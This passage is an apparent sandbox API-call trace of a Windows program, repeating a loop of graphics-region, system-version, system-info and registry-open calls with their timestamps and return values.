iMode=4) returned 2 [0087.749] CreateSolidBrush (color=0xff) returned 0x2100af1 [0087.749] CreateSolidBrush (color=0xff0000) returned 0x1100af4 [0087.749] DeleteObject (ho=0x1100af4) returned 1 [0087.749] DeleteObject (ho=0xb90401cd) returned 1 [0087.749] DeleteObject (ho=0xb70401d0) returned 1 [0087.749] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.749] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.749] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.749] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.749] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.749] BeginPath (hdc=0x0) returned 0 [0087.749] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.749] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.749] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.749] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.749] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.749] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.750] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.750] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.750] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xba0401cd [0087.750] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb80401d0 [0087.750] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040af5 [0087.750] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040af6 [0087.750] CombineRgn (hrgnDst=0x1040af5, hrgnSrc1=0xba0401cd, hrgnSrc2=0xb80401d0, iMode=1) returned 1 [0087.750] CombineRgn (hrgnDst=0x1040af6, hrgnSrc1=0xba0401cd, hrgnSrc2=0xb80401d0, iMode=4) returned 2 [0087.750] CreateSolidBrush (color=0xff) returned 0x2100af4 [0087.750] CreateSolidBrush (color=0xff0000) returned 0x1100af7 [0087.750] DeleteObject (ho=0x1100af7) returned 1 [0087.750] DeleteObject (ho=0xb80401d0) returned 1 [0087.750] DeleteObject (ho=0xba0401cd) returned 1 [0087.750] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.750] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.750] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.750] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.750] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.750] BeginPath (hdc=0x0) returned 0 [0087.750] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.750] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.750] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.750] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.750] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.750] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.750] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.750] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.750] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb90401d0 [0087.750] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbb0401cd [0087.750] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040af8 [0087.750] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040af9 [0087.750] CombineRgn (hrgnDst=0x1040af8, hrgnSrc1=0xb90401d0, hrgnSrc2=0xbb0401cd, iMode=1) returned 1 [0087.750] CombineRgn (hrgnDst=0x1040af9, hrgnSrc1=0xb90401d0, hrgnSrc2=0xbb0401cd, iMode=4) returned 2 [0087.750] CreateSolidBrush (color=0xff) returned 0x2100af7 [0087.750] CreateSolidBrush (color=0xff0000) returned 0x1100afa [0087.750] DeleteObject (ho=0x1100afa) returned 1 [0087.750] DeleteObject (ho=0xbb0401cd) returned 1 [0087.750] DeleteObject (ho=0xb90401d0) returned 1 [0087.750] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.751] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.751] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.751] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.751] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.751] BeginPath (hdc=0x0) returned 0 [0087.751] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.751] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.751] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.751] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.751] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.751] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.751] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.751] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.751] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbc0401cd [0087.751] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xba0401d0 [0087.751] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040afb [0087.751] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040afc [0087.751] CombineRgn (hrgnDst=0x1040afb, hrgnSrc1=0xbc0401cd, hrgnSrc2=0xba0401d0, iMode=1) returned 1 [0087.751] CombineRgn (hrgnDst=0x1040afc, hrgnSrc1=0xbc0401cd, hrgnSrc2=0xba0401d0, iMode=4) returned 2 [0087.751] CreateSolidBrush (color=0xff) returned 0x2100afa [0087.751] CreateSolidBrush (color=0xff0000) returned 0x1100afd [0087.751] DeleteObject (ho=0x1100afd) returned 1 [0087.751] DeleteObject (ho=0xba0401d0) returned 1 [0087.751] DeleteObject (ho=0xbc0401cd) returned 1 [0087.751] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.751] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.751] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.751] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.751] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.751] BeginPath (hdc=0x0) returned 0 [0087.751] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.751] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.751] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.751] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.751] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.751] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.751] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.751] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.752] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbb0401d0 [0087.752] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbd0401cd [0087.752] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040afe [0087.752] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aff [0087.752] CombineRgn (hrgnDst=0x1040afe, hrgnSrc1=0xbb0401d0, hrgnSrc2=0xbd0401cd, iMode=1) returned 1 [0087.752] CombineRgn (hrgnDst=0x1040aff, hrgnSrc1=0xbb0401d0, hrgnSrc2=0xbd0401cd, iMode=4) returned 2 [0087.752] CreateSolidBrush (color=0xff) returned 0x2100afd [0087.752] CreateSolidBrush (color=0xff0000) returned 0x1100b00 [0087.752] DeleteObject (ho=0x1100b00) returned 1 [0087.752] DeleteObject (ho=0xbd0401cd) returned 1 [0087.752] DeleteObject (ho=0xbb0401d0) returned 1 [0087.752] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.752] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.752] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.752] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.752] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.752] BeginPath (hdc=0x0) returned 0 [0087.752] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.752] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.752] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.752] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.752] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.752] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.752] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.752] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.752] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbe0401cd [0087.752] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbc0401d0 [0087.752] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b01 [0087.752] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b02 [0087.752] CombineRgn (hrgnDst=0x1040b01, hrgnSrc1=0xbe0401cd, hrgnSrc2=0xbc0401d0, iMode=1) returned 1 [0087.752] CombineRgn (hrgnDst=0x1040b02, hrgnSrc1=0xbe0401cd, hrgnSrc2=0xbc0401d0, iMode=4) returned 2 [0087.752] CreateSolidBrush (color=0xff) returned 0x2100b00 [0087.752] CreateSolidBrush (color=0xff0000) returned 0x1100b03 [0087.752] DeleteObject (ho=0x1100b03) returned 1 [0087.752] DeleteObject (ho=0xbc0401d0) returned 1 [0087.752] DeleteObject (ho=0xbe0401cd) returned 1 [0087.752] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.752] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.753] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.753] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.753] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.753] BeginPath (hdc=0x0) returned 0 [0087.753] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.753] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.753] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.753] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.753] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.753] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.753] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.753] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.753] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbd0401d0 [0087.753] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbf0401cd [0087.753] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b04 [0087.753] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b05 [0087.753] CombineRgn (hrgnDst=0x1040b04, hrgnSrc1=0xbd0401d0, hrgnSrc2=0xbf0401cd, iMode=1) returned 1 [0087.753] CombineRgn (hrgnDst=0x1040b05, hrgnSrc1=0xbd0401d0, hrgnSrc2=0xbf0401cd, iMode=4) returned 2 [0087.753] CreateSolidBrush (color=0xff) returned 0x2100b03 [0087.753] CreateSolidBrush (color=0xff0000) returned 0x1100b06 [0087.753] DeleteObject (ho=0x1100b06) returned 1 [0087.753] DeleteObject (ho=0xbf0401cd) returned 1 [0087.753] DeleteObject (ho=0xbd0401d0) returned 1 [0087.753] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.753] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.753] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.753] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.753] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.753] BeginPath (hdc=0x0) returned 0 [0087.753] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.753] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.753] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.753] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.753] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.753] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.753] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.753] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.753] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc00401cd [0087.753] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbe0401d0 [0087.754] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b07 [0087.754] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b08 [0087.754] CombineRgn (hrgnDst=0x1040b07, hrgnSrc1=0xc00401cd, hrgnSrc2=0xbe0401d0, iMode=1) returned 1 [0087.754] CombineRgn (hrgnDst=0x1040b08, hrgnSrc1=0xc00401cd, hrgnSrc2=0xbe0401d0, iMode=4) returned 2 [0087.754] CreateSolidBrush (color=0xff) returned 0x2100b06 [0087.754] CreateSolidBrush (color=0xff0000) returned 0x1100b09 [0087.754] DeleteObject (ho=0x1100b09) returned 1 [0087.754] DeleteObject (ho=0xbe0401d0) returned 1 [0087.754] DeleteObject (ho=0xc00401cd) returned 1 [0087.754] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.754] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.754] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.754] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.754] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.754] BeginPath (hdc=0x0) returned 0 [0087.754] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.754] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.754] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.754] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.754] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.754] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.754] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.754] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.754] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbf0401d0 [0087.754] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc10401cd [0087.754] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b0a [0087.754] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b0b [0087.754] CombineRgn (hrgnDst=0x1040b0a, hrgnSrc1=0xbf0401d0, hrgnSrc2=0xc10401cd, iMode=1) returned 1 [0087.754] CombineRgn (hrgnDst=0x1040b0b, hrgnSrc1=0xbf0401d0, hrgnSrc2=0xc10401cd, iMode=4) returned 2 [0087.754] CreateSolidBrush (color=0xff) returned 0x2100b09 [0087.754] CreateSolidBrush (color=0xff0000) returned 0x1100b0c [0087.754] DeleteObject (ho=0x1100b0c) returned 1 [0087.754] DeleteObject (ho=0xc10401cd) returned 1 [0087.754] DeleteObject (ho=0xbf0401d0) returned 1 [0087.754] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.754] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.754] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.754] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.754] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.754] BeginPath (hdc=0x0) returned 0 [0087.754] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.755] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.755] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.755] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.755] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.755] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.755] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.755] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.755] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc20401cd [0087.755] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc00401d0 [0087.755] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b0d [0087.755] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b0e [0087.755] CombineRgn (hrgnDst=0x1040b0d, hrgnSrc1=0xc20401cd, hrgnSrc2=0xc00401d0, iMode=1) returned 1 [0087.755] CombineRgn (hrgnDst=0x1040b0e, hrgnSrc1=0xc20401cd, hrgnSrc2=0xc00401d0, iMode=4) returned 2 [0087.755] CreateSolidBrush (color=0xff) returned 0x2100b0c [0087.755] CreateSolidBrush (color=0xff0000) returned 0x1100b0f [0087.755] DeleteObject (ho=0x1100b0f) returned 1 [0087.755] DeleteObject (ho=0xc00401d0) returned 1 [0087.755] DeleteObject (ho=0xc20401cd) returned 1 [0087.755] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.755] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, 